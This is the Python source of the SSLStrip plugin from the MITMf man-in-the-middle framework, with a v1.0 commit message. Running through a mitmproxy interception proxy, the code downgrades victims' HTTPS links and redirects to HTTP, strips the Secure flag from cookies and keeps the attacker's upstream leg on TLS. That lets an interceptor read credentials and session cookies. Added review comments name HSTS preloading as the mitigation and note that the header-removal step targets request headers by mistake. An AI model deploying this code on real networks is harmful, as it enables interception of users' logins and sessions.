MITMf/plugins/sslstrip.py
byt3bl33d3r eea5f53be2 Initial commit for v1.0 using mitmproxy instead of twisted
Added a plugin system to Net-Creds so you can now add your own parsers,
API hook names might change between now and the official release
(will submit a PR to the original repo once completed)

The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts
the code down by an insane amount, no more twisted! yay!

Basic plugins have been rewritten for the new proxy engine

Since we are using mitmproxy we have out of the box support for SSL/TLS!
2016-02-06 13:27:08 -07:00


import re
from plugins.plugin import Plugin
from netlib.http import decoded
from six.moves import urllib
class SSLStrip(Plugin):
    """Proxy plugin that rewrites HTTPS references to HTTP in proxied traffic.

    On responses it replaces 'https://' with 'http://' in the body and in an
    https 'Location' header, records the redirect target's hostname in
    ``context.secure_hosts``, and removes the ``secure`` attribute from
    'Set-Cookie' values. On requests it re-issues traffic for recorded hosts
    upstream over https on port 443.

    NOTE(review): the rewrite only applies to traffic that reaches the proxy
    as plain HTTP. A client that already holds an HSTS policy for a host
    (preloaded or cached from an earlier visit) upgrades the request itself,
    which is why HSTS with preloading is the standard mitigation. Signs of
    this rewrite on the client side are https links arriving as http and
    session cookies arriving without the Secure attribute.
    """

    name = 'SSLStrip'
    optname = 'sslstrip'
    desc = 'Performs SSLStripping attacks on requested pages'
    version = '1.0'

    def initialize(self, context):
        """Create the empty per-context set of hosts seen redirecting to https."""
        # Filled in by response() from 'Location' headers, read by request().
        context.secure_hosts = set()

    def request(self, context, flow):
        """Drop cache-validation headers and upgrade requests to known hosts."""
        # Without these two headers the request carries no conditional or
        # cache directives of the client's own.
        for header_name in ('If-Modified-Since', 'Cache-Control'):
            flow.request.headers.pop(header_name, None)

        # Hosts never seen redirecting to https are forwarded unchanged.
        if flow.request.pretty_host not in context.secure_hosts:
            return

        # The upstream leg goes over TLS; the client leg stays as it arrived.
        flow.request.scheme = 'https'
        flow.request.port = 443

    def response(self, context, flow):
        """Rewrite https references in the response body, redirect and cookies."""
        with decoded(flow.response):
            # NOTE(review): both names are response headers, but these calls
            # act on flow.request.headers only, so a policy sent by the server
            # still reaches the client through this code path.
            for header_name in ('Strict-Transport-Security', 'Public-Key-Pins'):
                flow.request.headers.pop(header_name, None)

            # Every 'https://' occurrence in the decoded body becomes 'http://'.
            body = flow.response.content
            flow.response.content = body.replace('https://', 'http://')

            # An https redirect is downgraded and its host remembered so that
            # request() can reach it over TLS later.
            location = flow.response.headers.get('Location', '')
            if location.startswith('https://'):
                hostname = urllib.parse.urlparse(location).hostname
                if hostname:
                    context.secure_hosts.add(hostname)
                # Only the leading scheme is replaced (count=1).
                flow.response.headers['Location'] = location.replace(
                    'https://', 'http://', 1
                )

            # Remove the '; secure' attribute from each Set-Cookie value.
            # The pattern is case-sensitive and matches lowercase 'secure' only.
            stripped_cookies = [
                re.sub(r';\s*secure\s*', '', cookie)
                for cookie in flow.response.headers.get_all('Set-Cookie')
            ]
            flow.response.headers.set_all('Set-Cookie', stripped_cookies)